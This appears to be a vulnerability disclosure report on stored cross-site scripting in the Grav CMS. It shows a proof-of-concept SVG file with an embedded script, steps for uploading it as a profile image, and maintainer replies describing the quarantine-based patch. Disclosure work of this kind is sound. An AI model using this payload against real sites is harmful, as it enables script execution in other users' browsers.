Cross-site Scripting (XSS) - Stored in getgrav/grav
Reported on
Jul 1st 2021
✍️ Description
Grav is vulnerable to XSS via bad SVG files. It is possible to upload an SVG file that contains errors after script tags.
🕵️♂️ Proof of Concept
SVG file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
<error>
</svg>
- Create an SVG file with the above content.
- Upload it through profile image update.
- Open the target URL.
💥 Impact
This vulnerability is capable of JavaScript code execution.
Occurrences
Hey Renan, how's it going my friend? I've just emailed the maintainer and am waiting to hear back. Good job!
Thank you for this Renan, we went with a slightly different patch where instead of emptying the file we move it into a quarantine folder. It is less drastic of an approach and gives the admins the opportunity to review the files. Sometimes SVG sanitization might fail even if not the file is not malicious.
You can check out the commit here https://github.com/getgrav/grav/commit/8af1229f6518c496d0c49aa1c9ff3e31b110ac7a
Thanks! Djamil
